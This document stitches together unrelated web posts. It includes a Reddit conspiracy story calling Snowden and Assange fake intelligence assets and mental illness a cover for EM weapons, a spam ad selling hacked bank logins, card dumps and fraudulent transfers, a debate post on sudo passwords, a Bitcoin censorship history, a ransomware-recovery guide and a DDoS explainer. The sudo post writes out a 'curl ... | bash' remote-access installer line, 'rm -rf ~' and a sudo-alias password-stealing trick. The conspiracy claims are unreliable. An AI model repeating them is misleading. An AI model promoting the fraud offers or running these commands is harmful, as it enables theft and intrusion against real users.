I've been sharing conspiracies on reddit longer than this sub has been around. I have a story to tell.
This story is mostly crafted from my own experiences, my conversations with some of the people involved, and the rest is my own guesswork as I try to fill in the gaps...so bear with me! That's why I wanted to share with this community, which I've watched grow over the years. I remember posting about the death of Barry Jennings (who witnessed explosions in the WTC on 9/11) the day after it happened. This was before /conspiracy (or right around when it was formed), and I remember thinking "we really need a sub for conspiracies on reddit!" And here we are, 12 years later and over 1.3 million subscribers...incredible! So... My story starts with a young man. We'll call him Andrew. Andrew grew up in the 90's in a coastal US town and quickly blossomed into a tech whiz at a young age. He began building his own computers, and after a brief stint using Windows, he decided that Bill Gates was everything wrong with technology (and the world), and he made it his mission to make sure folks like Gates were NOT the future of computers. He really believed that the use of technology was a fundamental human right, and that charging people for "proprietary" OS's that hid their source code was a violation of these rights. He saw a possible Deus Ex-like future, with a technocracy literally around the corner if we didn't act now. Andrew soon joined the Free Software Foundation and began rubbing elbows with the likes of Richard Stallman. He begun exclusively using GNU/Linux and was the type to correct you if you called it just "Linux". He also began visiting tech-savvy forums like slashdot and started networking in earnest. By 2006 (his senior year of high school) Andrew was completely over his "education" and decided to just drop out completely. Shockingly, a college accepted him anyway. A small East Coast school had been actively courting Andrew, and when they learned he had failed to get his HS diploma, they accepted him anyway! Now sometime during this period Andrew went to Iceland and stayed in Reykjavik for several months. This trip may have happened during the summer, fall, or early winter of 2006. The reason for his trip had something to do with his efforts in the FSF or similar group. The possible significance of this trip will become clear as we go on. What is clear is that Andrew started college in the fall of 2006, and that the circumstances were unusual. Andrew soon met several like-minded individuals and began building a social and technological network at his school. Two individuals in particular would become key players in his life (one more prominently in this story, but the other was significant as well), and eventually the 3 would live together in town for several years. But for now let's stick with Andrew. Andrew had an idea to build a social network for his college. Except, it wasn't just a network, it was a wiki for information about the school...and beyond. Soon, it began to morph into something much bigger in Andrew's mind. He saw his project as being one of many data "hubs" for leaks of important documents and otherwise sensitive information. So yeah, he saw the opportunity for a wiki for leaks (see where this is going yet...?). As his ambitions grew, his behavior started to become increasingly erratic. He was caught with drugs and arrested. Strangely, the charges were pretty much dropped and he was given a slap on the wrist. Eventually he decided to leave the school, but still lived in town and had access to the servers on campus. By 2010 Andrew was still living in the small town with his two "hacker" buddies, who were still enrolled at the school. This house was in some ways legendary. It appears that many "interesting" people spent time at or visited the residence. Indeed, some of the early movers and shakers of /conspiracy itself passed through. There was usually a full NO2 tank for anyone who was into that kinda thing, and they were stocked with every hallucinogen and research chemical known to man. It was also likely under surveillance by multiple intelligence agencies (NSA/Mossad/etc). Over time, the mental state of Andrew was slowly starting to deteriorate, which wasn't helped by his abuse of drugs. Still, Andrew decided to move his base of operations to Europe, spending time in Belgium, the Czech Republic and elsewhere. One of his housemates was soon to join him on his adventures in Europe and elsewhere abroad. We'll call him "Aaron." Aaron had a very similar story and upbringing as Andrew. Aaron was also from a coastal US town and was born into privilege. He was also, supposedly, born into a family with some serious connections to intelligence agencies, including an uncle with ties to the NSA, and both parents connected to military brass. By 2015, Andrew and Aaron were living together in the Czech Republic. During this time they were working directly and/or indirectly for the NSA (via Cisco and other companies). You see, the "college" they met at was actually a front for the recruitment of kids into the IC. Apparently, many "schools" in the US function that way. Go figure. Their intelligence and valuable skill set (hacking etc) made them valuable assets. They were also possibly involved with the distribution of certain "research chemicals" (of the 2C* variety) to dignitaries and their entourages (in one example, they provided 2CB to a group with David Cameron). In addition, Andrew was allegedly involved with, or stumbled upon, an NSA-linked surveillance project directed at the entire country of Malaysia, while Aaron was involved with Cisco. Aaron himself had gotten into hot water for releasing damaging information about the NSA, and even claimed to be an NSA whistleblower, and was also possibly the individual who leaked the 2014 (or 2015) Bilderberg meeting list. And then things went bad. Andrew quit the Malaysia project and Aaron left Cisco. It seems Andrew and Aaron were "set up" during a fiery false flag event in the Czech Republic in 2015. It may have happened at an embassy, but it's unclear which. There is no information on the web about anything like this (afaik). Aaron was immediately targeted and spent several years on the run. Allegedly, he was added to the list of victims in the so-called "Great Game". The Great Game is the term used for an international assassination program where intelligence agencies share a list of targets to be neutralized. The German BND and Mossad are heavily involved, as other networks. Individuals targeted by the Great Game may be offed by actual assassins, or by NPC-like humans whose minds will be influenced by mind control tech (a la Matrix...say influencing someone to ram your car unwittingly ie). As Aaron went on the lam, Andrew soon returned to the US, shell-shocked by his experience. Both Andrew and Aaron continue to suffer from some sort of PTSD from these series of events, rendering Andrew largely incapacitated and Aaron scattered and discombobulated. The Meat of the Matter OK...where does that leave us? Why am I sharing all of this? I think there's much more to this story. So let's start speculating! Everything I'm about to say is stuff that was told to me personally. I can't vouch for any of this information, though obviously I thought it was compelling enough to share. Here's the gist: The so-called whistleblowers you see in the media are almost all fake. This includes: Edward Snowden, Julian Assange, Thomas Drake and William Binney (hey look, his AMA is pinned on this sub right now...no comment!). These individuals, and others, are controlled opposition. The real whistleblowers are severely punished. For example, Bradley Manning was punished with chemical castration in jail. His "transformation" was chemically induced torture. Andrew was not alone in his passion. There were lots of other young visionaries like him who dreamed of a freer and more transparent world. In this story, Julian Assange was an intelligence asset...a psyop meant to steal the thunder from real activists like Andrew. In this story, a small college-based "wiki" for government leaks was used as the model for an intelligence operation known as "wikileaks". In this story, Andrew traveled to Iceland at some point in 2006. When was Wikileaks founded? Wikileaks was founded by Julian Assange in December 2006, in Iceland. Aaron discovered (legally, like Manning who had clearance to access all the data he leaked) damning information about surveillance happening by the NSA, specifically against recruits entering the US army and elsewhere. In this story, the "Andrew" identity was co-opted and turned into "Julian Assange", and "Aaron" became "Edward Snowden". Granted, there were probably other people that these whistleblower imposters were modeled after, but Andrew and Aaron seem like very strong contenders for some of this inspiration. Now, much of the following may be gobbledygook (lol I spelled that right first try!) for all I know, but since I'm having a really hard time making sense of it all, I'll just include everything I can and let you guys run with it. Here are some phrases, ideas, terms and people of note that may be involved with this story...MODS: None of this is doxing! All of the links of people are wikipedia pages or published interviews/articles. So yeah. Not dox!
Rootkit: These are currency and the weapons of the intelligence agencies that allow access to any computer or OS on the planet.
"schizo-affective disorder" doesn't exist, it's cover for EM warfare. For those they can't attack chemically (like Manning), they punish via EM. This technology has been used for decades. Both Andrew and Aaron were likely subjected to this punishment after they stopped playing ball. It likely continues for them both as well.
IN CONCLUSION I don't know how these terms, theories and individuals fit into this story, but that they may be somehow related. Hopefully there are enough bread crumbs in here to keep some of you busy! Any help/insight would be appreciated. I confess I'm not so tech-minded so I can't offer any more explanation about some of the more techy terms. Anyway, thanks for reading, and thanks for continuing to stimulate after all these years! It's really nice to see this place continuing to thrive after all of this time!
The following articles / guides have been translated into Russian and posted on the XMR.RU website and my Github repository. Note: If you would like to read the original article in English, then, open the article you are interested in, and at the end of each article you will find a link to the source.
Hi everyone We are Group of Young Rusian and australian Hackers, we will share with you all what we have and learn earlier . BUY BANK LOGINS, CVV FULLZ, DUMPS, 101 & 201, TRANSFERS, TUTORIALS, SPAM TOOLS, RDP, VPN, BOTNETS, SCAM PAGES Contact for help: [[email protected]](mailto:[email protected]) ICQ: 721808635 Buy Hacked PayPal, Bank Logins, WesternUnion, cc top up, cvv, smtp, RDP, inbox mailer, email leads, dumps, wares, with proofs of transactions and accounts. I am selling hacked western union, hacked PayPal accounts, bank logins, MoneyBookers, CC details/transfer, Hacked iTunes Accounts, Dumps, wares and fullz infos. I have many customers and buyers all over the world and they trust me and i promised to never break this chain till DEATH I'm offering many offers to earn online money through sources like western union transfers, bank transfers, moneybookers and PayPal transfers through offshore database. All transactions are offshore and anonymous and has no trace backs or chargebacks Come with us and enjoy the best products to make money , how to shop online ,buy your stuff freely and make much tax free Cash Our online support only to serious customers Country for sale : USA, UK, CA, AU, EU and more. Credit Card All Countries Western Union Money Transfers Card Dumps, Track 1+2 (with pin) Hacking Bank Login ,paypal world wide(bank transfers) Payment methods: Bitcoin, Perfect Money, Web Money Hopefully we can find a good customer to do business together long term You will feel happy, confident and safe to work with us, that's for sure PRIX MSR: MSR505 / MSR2000: 549 $ MSR505 / MSR300 *: 499 $ MSR505 / TA-48: 639 $ MSR206 / MSR3000: 729 $ MSR206 / MSR300: 549 $ MSR206 2× MSR400: 900 $ MSR206 2× MSR500m (Mini123): 875 $ MSR206 2× TA-32: 990 $ MSR206 2× CRM42: 869 $ MSR206 2×CRM41: 929 $ Western Union Transfer Rates $1000 Transfer = $100 Charge $3000 Transfer = $250 $4500 Transfer = $350 $7000 Transfer $500 Bank Transfers :- This is my responsibility is to transfer the required amount into your account from an offshore server, you have no trace back or charge backs, but it is your responsibility to handle the bankers and get safe your side. i will use my personal method for making clear payment so no dispute no charge back chances. (transferring all over the world) Info needed for Bank transfers : 1: Bank name 2: Bank address 3: Zip code 4: Account Holder 5: Account number 6: Account Type 7: Routing number 8: Swift number 9: BIC and IBAN Bank transfer will take maximum 6hours to show money in your bank account. Bank Transfer Rates: $1000 transfer = $100 Charges $3000 Transfer = $250 Charges $5000 Transfer = $400 Charges $10,000 Transfer = $800 Charges $15,000 Transfer = $1200 Charges MoneyBookers Transfer :- Offering moneybookers/skrill transfer worldwide. It is a instant payment/transfer. I’m using an offshore server to transfer moneybookers so there is no chargeback and negative feedback. (transferring all over the world) Money Bookers Transfer Rates : $1800 Transfer = $150 Charges � $3000 Transfer = $250 Charges $5000 Transfer = $400 Charges $9000 Transfer = $700 Charges � $15000 Transfer = $1200 Charges Paypal Transfer :- Paypal Transfer Rates: $1800 Transfer = $150 Charges $3000 Transfer = $250 Charges $5000 Transfer = $400 Charges $9000 Transfer = $700 Charges $15,000 Transfer = $1200 Charges CreditCard TopUP Rates:- $1800 transfer = $150 Charges $3000 Transfer = $250 Charges $5000 Transfer = $400 Charges $10,000 Transfer = $800 Charges $15,000 Transfer = $1200 Charges ***Also selling RDP, SMTP SERVERS, WEBMAIL, MAILERS, BULK MAILS (US/UK based) DATING ACCOUNTS, cPanel HOSTING, Hacked Panels, CC dumps. Thanks All. Contact: [[email protected]](mailto:[email protected])
CMV: Requiring a password for "sudo" access on desktop Linux systems is nothing but security theater.
Furthermore: on desktop systems it is perfectly fine to put NOPASSWD:ALL in your /etc/sudoers and similar in /etc/polkit-1/rules.d. In fact, I think this should be the default so users do not get a false sense of security. For clarity, I'm not saying that all accounts should have sudo access, just saying that there's no meaningful security distinction between "sudo access with password" and "sudo access without password", and the "with password" path does nothing but wasting the user's time and giving them a false sense of security. Argument #1: compromising a user account effectively compromises everything you care about. As the relevant XKCD says, if your user account is compromised, the attacker cal already do everything he probably cares about. This includes:
The ability to steal all your documents, email, SSH keys, cryptowallets, and keylog all your passwords.
The ability to encrypt the above with cryptoransomware.
The ability to mine bitcoins/cryptocurrency in the background.
The ability to install a remote access tool on your system and make your system join a botnet.
Yes, you can run a remote access tool without root. Starting programs at boot does not require root (see systemctl --user, .bashrc, crontab -e, whatever). Internet access does not require root (see: your browser). I frequently see users thinking that remote access kits require root for some reason. Thanks to the X protocol, keylogging does not require root access either on most systems. The uses for root-level access I can think of is (1) to infect other users of the system, and (2) to install a rootkit infecting your firmware to survive OS reinstallation. The alleged other users do most likely not exist on desktop systems, and only advanced viruses would put rootkits in firmware—viruses with that level of sophistication may as well use the following point to gain root access after compromising an user account. Argument #2: compromising access to a user account with sudo access effectively compromises root, and a password check won't stop that. If your account is in the sudoers file, actively used, and an attacker compromises your account, there are a bazillion ways to get access to root. Here are some examples:
Run a keylogger and wait until the user inputs their password voluntarily. "sudo [keys][enter][keys][enter]" is an easy pattern to spot.
Run a service that periodically calls sudo and waits until sudo works without password. Sudo by default does not require a password if a password has already been given in the past 5 minutes, so you just need to wait until the user runs sudo himself for whatever reason and then piggyback.
Modify the ~/.bashrc and add alias sudo=evilsudo, where evilsudo invokes the real sudo but also steals the user's password in the process.
Modify the start menu to replace a commonly used sudo-level GUI application (like software updates) with their evil copy, which steals their password and then invokes the original program.
Since Linux has made it effectively impossible to use a system without occasional root usage, you will elevate yourself to root at some point, and at that point the attacker will be able to steal said root access one way or another. Often-heard counterargument: "If you allow sudo without password and leave your computer unattended without locking it, then some passerby may be able to sudo something, but if sudo required a password, he wouldn't have the time to do one of the advanced techniques above." Reply: targeted attacks can "curl URL_OF_REMOTE_ACCESS_KIT_INSTALLATION_SCRIPT | bash". Random passerby trolls can ruin your day with "rm -rf ~". Both can be typed fairly quickly and neither requires root-level access. Although I do consider myself a security-focused person, entering my password upon every sudo is still something I consider a waste of keystrokes and a source of security myths. Since the majority of the Linux world seems to disagree with me, I would like to know whether there's something major I'm overlooking.
I haven't seen this posted in a while. If you've never read this post, you really should. Edit: Screwed up the formatting. See other comments. People should get the full story of bitcoin because it is probably one of the strangest of all reddit subs. bitcoin, the main sub for the bitcoin community is held and run by a person who goes by the pseudonym u/theymos. Theymos not only controls bitcoin, but also bitcoin.org and bitcointalk.com. These are top three communication channels for the bitcoin community, all controlled by just one person. For most of bitcoin's history this did not create a problem (at least not an obvious one anyway) until around mid 2015. This happened to be around the time a new player appeared on the scene, a for-profit company called Blockstream. Blockstream was made up of/hired many (but not all) of the main bitcoin developers. (To be clear, Blockstream was founded before mid 2015 but did not become publicly active until then). A lot of people, including myself, tried to point out there we're some very serious potential conflicts of interest that could arise when one single company controls most of the main developers for the biggest decentralised and distributed cryptocurrency. There were a lot of unknowns but people seemed to give them the benefit of the doubt because they were apparently about to release some new software called "sidechains" that could offer some benefits to the network. Not long after Blockstream came on the scene the issue of bitcoin's scalability once again came to forefront of the community. This issue came within the community a number of times since bitcoins inception. Bitcoin, as dictated in the code, cannot handle any more than around 3 transactions per second at the moment. To put that in perspective Paypal handles around 15 transactions per second on average and VISA handles something like 2000 transactions per second. The discussion in the community has been around how best to allow bitcoin to scale to allow a higher number of transactions in a given amount of time. I suggest that if anyone is interested in learning more about this problem from a technical angle, they go to btc and do a search. It's a complex issue but for many who have followed bitcoin for many years, the possible solutions seem relatively obvious. Essentially, currently the limit is put in place in just a few lines of code. This was not originally present when bitcoin was first released. It was in fact put in place afterwards as a measure to stop a bloating attack on the network. Because all bitcoin transactions have to be stored forever on the bitcoin network, someone could theoretically simply transmit a large number of transactions which would have to be stored by the entire network forever. When bitcoin was released, transactions were actually for free as the only people running the network were enthusiasts. In fact a single bitcoin did not even have any specific value so it would be impossible set a fee value. This meant that a malicious person could make the size of the bitcoin ledger grow very rapidly without much/any cost which would stop people from wanting to join the network due to the resource requirements needed to store it, which at the time would have been for very little gain. Towards the end of the summer last year, this bitcoin scaling debate surfaced again as it was becoming clear that the transaction limit for bitcoin was semi regularly being reached and that it would not be long until it would be regularly hit and the network would become congested. This was a very serious issue for a currency. Bitcoin had made progress over the years to the point of retailers starting to offer it as a payment option. Bitcoin companies like, Microsoft, Paypal, Steam and many more had began to adopt it. If the transaction limit would be constantly maxed out, the network would become unreliable and slow for users. Users and businesses would not be able to make a reliable estimate when their transaction would be confirmed by the network. Users, developers and businesses (which at the time was pretty much the only real bitcoin subreddit) started to discuss how we should solve the problem bitcoin. There was significant support from the users and businesses behind a simple solution put forward by the developer Gavin Andreesen. Gavin was the lead developer after Satoshi Nakamoto left bitcoin and he left it in his hands. Gavin initially proposed a very simple solution of increasing the limit which was to change the few lines of code to increase the maximum number of transactions that are allowed. For most of bitcoin's history the transaction limit had been set far far higher than the number of transactions that could potentially happen on the network. The concept of increasing the limit one time was based on the fact that history had proven that no issue had been cause by this in the past. A certain group of bitcoin developers decided that increasing the limit by this amount was too much and that it was dangerous. They said that the increased use of resources that the network would use would create centralisation pressures which could destroy the network. The theory was that a miner of the network with more resources could publish many more transactions than a competing small miner could handle and therefore the network would tend towards few large miners rather than many small miners. The group of developers who supported this theory were all developers who worked for the company Blockstream. The argument from people in support of increasing the transaction capacity by this amount was that there are always inherent centralisation pressure with bitcoin mining. For example miners who can access the cheapest electricity will tend to succeed and that bigger miners will be able to find this cheaper electricity easier. Miners who have access to the most efficient computer chips will tend to succeed and that larger miners are more likely to be able to afford the development of them. The argument from Gavin and other who supported increasing the transaction capacity by this method are essentially there are economies of scale in mining and that these economies have far bigger centralisation pressures than increased resource cost for a larger number of transactions (up to the new limit proposed). For example, at the time the total size of the blockchain was around 50GB. Even for the cost of a 500GB SSD is only $150 and would last a number of years. This is in-comparison to the $100,000's in revenue per day a miner would be making. Various developers put forth various other proposals, including Gavin Andresen who put forth a more conservative increase that would then continue to increase over time inline with technological improvements. Some of the employees of blockstream also put forth some proposals, but all were so conservative, it would take bitcoin many decades before it could reach a scale of VISA. Even though there was significant support from the community behind Gavin's simple proposal of increasing the limit it was becoming clear certain members of the bitcoin community who were part of Blockstream were starting to become increasingly vitriolic and divisive. Gavin then teamed up with one of the other main bitcoin developers Mike Hearn and released a coded (i.e. working) version of the bitcoin software that would only activate if it was supported by a significant majority of the network. What happened next was where things really started to get weird. After this free and open source software was released, Theymos, the person who controls all the main communication channels for the bitcoin community implemented a new moderation policy that disallowed any discussion of this new software. Specifically, if people were to discuss this software, their comments would be deleted and ultimately they would be banned temporarily or permanently. This caused chaos within the community as there was very clear support for this software at the time and it seemed our best hope for finally solving the problem and moving on. Instead a censorship campaign was started. At first it 'all' they were doing was banning and removing discussions but after a while it turned into actively manipulating the discussion. For example, if a thread was created where there was positive sentiment for increasing the transaction capacity or being negative about the moderation policies or negative about the actions of certain bitcoin developers, the mods of bitcoin would selectively change the sorting order of threads to 'controversial' so that the most support opinions would be sorted to the bottom of the thread and the most vitriolic would be sorted to the top of the thread. This was initially very transparent as it was possible to see that the most downvoted comments were at the top and some of the most upvoted were at the bottom. So they then implemented hiding the voting scores next to the users name. This made impossible to work out the sentiment of the community and when combined with selectively setting the sorting order to controversial it was possible control what information users were seeing. Also, due to the very very large number of removed comments and users it was becoming obvious the scale of censorship going on. To hide this they implemented code in their CSS for the sub that completely hid comments that they had removed so that the censorship itself was hidden. Anyone in support of scaling bitcoin were removed from the main communication channels. Theymos even proudly announced that he didn't care if he had to remove 90% of the users. He also later acknowledged that he knew he had the ability to block support of this software using the control he had over the communication channels. While this was all going on, Blockstream and it's employees started lobbying the community by paying for conferences about scaling bitcoin, but with the very very strange rule that no decisions could be made and no complete solutions could be proposed. These conferences were likely strategically (and successfully) created to stunt support for the scaling software Gavin and Mike had released by forcing the community to take a "lets wait and see what comes from the conferences" kind of approach. Since no final solutions were allowed at these conferences, they only served to hinder and splinter the communities efforts to find a solution. As the software Gavin and Mike released called BitcoinXT gained support it started to be attacked. Users of the software were attack by DDOS. Employees of Blockstream were recommending attacks against the software, such as faking support for it, to only then drop support at the last moment to put the network in disarray. Blockstream employees were also publicly talking about suing Gavin and Mike from various different angles simply for releasing this open source software that no one was forced to run. In the end Mike Hearn decided to leave due to the way many members of the bitcoin community had treated him. This was due to the massive disinformation campaign against him on bitcoin. One of the many tactics that are used against anyone who does not support Blockstream and the bitcoin developers who work for them is that you will be targeted in a smear campaign. This has happened to a number of individuals and companies who showed support for scaling bitcoin. Theymos has threatened companies that he will ban any discussion of them on the communication channels he controls (i.e. all the main ones) for simply running software that he disagrees with (i.e. any software that scales bitcoin). As time passed, more and more proposals were offered, all against the backdrop of ever increasing censorship in the main bitcoin communication channels. It finally come down the smallest and most conservative solution. This solution was much smaller than even the employees of Blockstream had proposed months earlier. As usual there was enormous attacks from all sides and the most vocal opponents were the employees of Blockstream. These attacks still are ongoing today. As this software started to gain support, Blockstream organised more meetings, especially with the biggest bitcoin miners and made a pact with them. They promised that they would release code that would offer an on-chain scaling solution hardfork within about 4 months, but if the miners wanted this they would have to commit to running their software and only their software. The miners agreed and the ended up not running the most conservative proposal possible. This was in February last year. There is no hardfork proposal in sight from the people who agreed to this pact and bitcoin is still stuck with the exact same transaction limit it has had since the limit was put in place about 6 years ago. Gavin has also been publicly smeared by the developers at Blockstream and a plot was made against him to have him removed from the development team. Gavin has now been, for all intents an purposes, expelled from bitcoin development. This has meant that all control of bitcoin development is in the hands of the developers working at Blockstream. There is a new proposal that offers a market based approach to scaling bitcoin. This essentially lets the market decide. Of course, as usual there has been attacks against it, and verbal attacks from the employees of Blockstream. This has the biggest chance of gaining wide support and solving the problem for good. To give you an idea of Blockstream; It has hired most of the main and active bitcoin developers and is now synonymous with the "Core" bitcoin development team. They AFAIK no products at all. They have received around $75m in funding. Every single thing they do is supported by theymos. They have started implementing an entirely new economic system for bitcoin against the will of it's users and have blocked any and all attempts to scaling the network in line with the original vision. Although this comment is ridiculously long, it really only covers the tip of the iceberg. You could write a book on the last two years of bitcoin. The things that have been going on have been mind blowing. One last thing that I think is worth talking about is the u/bashco's claim of vote manipulation. The users that the video talks about have very very large numbers of downvotes mostly due to them having a very very high chance of being astroturfers. Around about the same time last year when Blockstream came active on the scene every single bitcoin troll disappeared, and I mean literally every single one. In the years before that there were a large number of active anti-bitcoin trolls. They even have an active sub buttcoin. Up until last year you could go down to the bottom of pretty much any thread in bitcoin and see many of the usual trolls who were heavily downvoted for saying something along the lines of "bitcoin is shit", "You guys and your tulips" etc. But suddenly last year they all disappeared. Instead a new type of bitcoin user appeared. Someone who said they were fully in support of bitcoin but they just so happened to support every single thing Blockstream and its employees said and did. They had the exact same tone as the trolls who had disappeared. Their way to talking to people was aggressive, they'd call people names, they had a relatively poor understanding of how bitcoin fundamentally worked. They were extremely argumentative. These users are the majority of the list of that video. When the 10's of thousands of users were censored and expelled from bitcoin they ended up congregating in btc. The strange thing was that the users listed in that video also moved over to btc and spend all day everyday posting troll-like comments and misinformation. Naturally they get heavily downvoted by the real users in btc. They spend their time constantly causing as much drama as possible. At every opportunity they scream about "censorship" in btc while they are happy about the censorship in bitcoin. These people are astroturfers. What someone somewhere worked out, is that all you have to do to take down a community is say that you are on their side. It is an astoundingly effective form of psychological attack.
How Ransomware Encryption Happens & 4 Methods for Recovery
We know how overwhelming it can feel to be the victim of a ransomware attack and how your business cannot operate due encrypted or locked files. This page delivers insight on why your files were encrypted or locked, and the options you have to decrypt ransomware. As a ransomware recovery service provider, we have helped thousands of clients successfully recover their data and decrypt their data. Evaluating all options will include analyzing the encrypted files, and the least desirable option to pay the ransom demand if necessary. Our process helps provide critical insight into decrypting ransomware and the available options that clients have. By the end of this piece, it is our goal to show you what is involved to successfully recover your files. This guide outlines what steps and research are necessary to decrypt or unlock your files from a ransomware attack.
You’re the victim of a ransomware attack
You arrive to work and start noticing suspicious alerts coming from your servers, and none of the databases are functional. Your co-workers are frantic and cannot access any of their data. You investigate further and find all of the files on your network are renamed and discover ransom notes, and a screen asking you to email someone if you want your data back. You finally realize that you are a victim of a ransomware attack, and all of your files are locked or encrypted.
3 Common Ways Your Files Were Encrypted or Locked
Ransomware succeeds when businesses have poor security hygiene. Organizations that lack policies & procedures around data security will have a higher risk of ransomware attacks. Here are some of the most common ways to fall victim to a ransomware attack:
Open Remote Desktop Protocol Ports (RDP)
Businesses that have improperly configured network security may leave their Remote Desktop Protocol (RDP) ports open. Unknowingly, this is the equivalent of leaving the front door unlocked when you leave your home: it provides an opportunity for cyber attacks to come through with little deterrence. Once a hacker is connected to your network, they can install ransomware and additional back doors to access your network at a later date. A large percentage of ransomware attacks still use this method of attack because so many organizations are not even aware of this security vulnerability.
Ransomware can infiltrate your network by a malicious email campaign known as a phishing attack. Ransomware operators use massive networks of internet-connected devices (botnets) to send phishing emails to unsuspecting victims. These emails intend to trick the receiver into clicking on a malicious attachment or link, which can secretly install the ransomware virus or other malware. Phishing emails are becoming increasingly difficult to detect as cybercriminals find clever ways to make a malicious email look legitimate. This underscores the importance of security awareness training for everyone in the organization, not just the I.T. department.
The ransomware operators may have used previously compromised passwords from employees at your organization to gain unauthorized access to the networks. This derives from the poor security practices of reusing the same passwords for multiple accounts and authentication processes. If your employees have been using old & weak passwords to access your business data, a cyber criminal can use a previously compromised password to initiate the attack. Remember to always to follow good password hygiene. The variety of attack vectors highlights the importance of a digital forensics investigation that can help victims understand how the ransomware came onto your computer and what steps you can take to remediate the vulnerability.
4 Options for Ransomware Recovery
In this section, we cover the options to restore files encrypted or locked by ransomware.
1. Recover files with a backup
If your files become encrypted in a ransomware attack, check to see if you have backups to restore and recover (in order).
Off-site or offline backup. Having your backup stored in the cloud or offline would protect the data from the virus since it is not accessible at the time of the attack.
Check your Windows Shadow Copies. Even though most ransomware will delete Windows Shadow Copies, you might get lucky and find them intact.
Check your on-site backups. We observe that most on-site data is either manually deleted by the attacker, or encrypted by the ransomware virus.
2. Recreate the data
Even though your files are encrypted by ransomware, you might be able to recreate the data from a variety of sources as outlined below:
Recreate the data from paper copies. When you have clean systems and physical copies of your data, you can re-enter the data manually from paper copies into your computers and servers.
Piece together data from email. Email exchanges are a great way to salvage some of your data from email attachments.
Database mining. Some ransomware variants only encrypt a small part of a database or backup files so you can pull out good, usable data.
3. Breaking the ransomware encryption
The harsh truth is that the majority of ransomware encryption is unbreakable. This impossibility is a tough concept for many of us to accept, given the technological advances of our society. Does this mean you should skip looking into whether the ransomware encryption can be broken? This option should always be explored if presented by a ransomware recovery firm, although the final choice is yours to make. We will lay out a real life example at Proven Data below to outline why this was a great decision for a company that was infected with ransomware. While it tends to be rare, there are poorly constructed ransomware encryptions that have been broken by security researchers. If you can avoid paying a ransom, you should at all costs. There can be flaws in the malware or weaknesses in the encryption. Businesses can look at these options, especially if time is on your side. There are also free ransomware decryption resources that provide tools for previously decrypted ransomware variants. A client of ours had hired a ransomware recovery company to recover their files until we discovered at the very last moment through our analysis that the encryption was breakable. With less than 20 minutes to spare, we saved the client out of paying a $450,000 ransom.
Why can’t most ransomware encryption be broken?
Ransomware is a cryptovirus, which means it uses cryptography in combination with malware to lock your files. Modern cryptography uses sophisticated mathematical equations (algorithms) and secret keys to encrypt and decrypt data. If strong encryption is used, it can take thousands, if not millions of years to break the encryption given the strength of today’s computers. Encryption is a security tool created with the intent of data protection. It is a defensive tool to provide security, privacy, and authentication. Sadly, ransomware attackers are using it as a weapon against innocent victims.
How do I know if the encryption can be broken?
You can start off with this free ransomware identification resource to determine the feasibility of decryption. You will need to upload the ransom note and a sample file into the ID-Ransomware website, and it will tell you if there is a free decrypter or if it is an unknown ransomware variant. Please note that the tool is not always 100% accurate. If the variant is still under analysis, you will need a malware or encryption analyst to determine whether or not there is a possibility for decryption. Encryption is designed to be unbreakable, which is why security researchers can’t simply make a tool for ransomware decryption. These unbreakable encryptions protect our bank accounts, trade secrets, government data, and mobile communications, among other things. It would be a significant security concern if there were a master decryption tool that could break encryption algorithms.
4. Paying the ransom to decrypt ransomware files
If the encryption is too strong, the only way to obtain the decryption key for your files is to pay the ransom. Many ransomware victims don’t have time on their side because they are facing significant business disruption. Each minute that passes could be a lost client, or worse for a medical organization. Here is a list of the most prevalent ransomware variants that are known to be “cryptographically secure,” which means that Proven Data or the security community has confirmed the encryption is unbreakable:
I don’t want to pay the hackers ransom.
Businesses and individuals have the option of choosing not to pay the ransom in a ransomware attack to regain access to their files. For personal, political, or moral reasons, there has been resentment of the ransomware economy, and victims do not have to engage in extortion. If paying the ransom is the only option, you should know what to expect before considering moving forward.
How a ransomware recovery specialist can help
If you do decide to use a ransomware recovery company and if there is one thing you get out of this article, it is this: You should always question how a ransomware recovery company is recovering your data. If you are unsure, asking the right questions will ensure a transparent experience:
How are you recovering my locked / encrypted data?
How much will ransomware recovery cost?
Do you have experience with this variant?
A ransomware recovery specialist can analyze your current situation and determine what options are available to you at the time of the inquiry. A competent and experienced ransomware recovery company should be able to provide the following:
Understanding the ransomware variant and what to expect
Malware analysis to determine if the encryption can be broken
Consultation on the attack vector which caused the attack and preventative methods
Digital currency readily available to facilitate the ransom payment expeditiously
Modification of non-functioning or poorly-functioning decryption programs that are causing delays in decrypting your files
Repairing damaged databases or files
Understanding how your files were affected by ransomware in the first place will provide you with the insight needed to prevent another attack. Whether you choose Proven Data or another company to decrypt your ransomware files, it’s important to know what unknowns there may be out there. Our threat intelligence that we’ve gathered from the thousands of previous cases enable you to make informed decisions in helping restore your data after a ransomware attack. If you require a company with such experience, we’re standing by to assist 24/7.
Hi guys, I want to open this thread to talk about the biggest problem we are all facing right now in Rainbow Six Siege. DDOS was always in some way a part of R6s, 3-4 seasons back it was quite rare to run across a booter on the enemy team. Now it has gotten so bad that you almost cannot play ranked on console anymore, atleast on high ranks like Platinum to Diamond. For me personally i'm not even that mad because of booting the servers, on higher ranks you get to know enemy players by name and meeting them over and over across the years, and that just proves that the enemies are bad to the point of hitting the server down, which is satisfying because you know that you won that game. But nonetheless it's game breaking, and im not trying to defend booting in any way, just my opinion. Now some big youtubers are responding to the community by making videos to get the devs attention. This has been done over the last year or more, they never really gave their statement to ddosing as far as i know (correct me if im wrong) but they have always been working on stabilising their servers to reduce lag (and probably prevent booting). I'm certainly not a pro in terms of computers and IT, but i know things. 99% of the community says ddossing cannot be stopped. Okay, so Ubisoft does NOT own any server, these are microsoft Azure servers that ubisoft rents to run Rainbow Six (PC, XB & PS4). These servers have a Public IP Adress that can be tracked pretty easily if you have some basic computer knowledge and the right tool. Microsoft servers have securities to prevent attacks, and they have been optimizing security a number of times, but people kept finding new ways to perform attacks, since there are plenty. *IF you already know and understand what ddos is, please skip this part, but since there are constantly new players on rainbow that report ddosing as server problems because they don't know what it is, i will explain it in easy terms. So DDOS means Distributed Denial of Service, if i browse a website, my computer constantly exchanges packages with the IP adress of that site, so the site keeps track of what i'm doing and i can browse where i need to be. Now if i had 5000 computers in my room, every computer performing 100 demands on that website, all at the same time, you could imagine what happens. This is what DDOSers do on rainbow Six, via Botnets. Botnets are a large group of "infected" computers, that belong to this Botnet, without knowing so. So the DDOSer on Rainbow buys or gets a suscription for a botnet service which he then gets his acces to, either by a website or a programm like an SSH Telnet client (example: putty). By entering the IP Adress of that game server, he commands every bot that is part of the network to send a huge amount of fake data to that server, completety flooding him with demands, which ends up in crashing the server. In case of "game freezing", the botnet sends a calculated amount of data to barely keep the server going but too much for the server to actually handle other things, like player movement 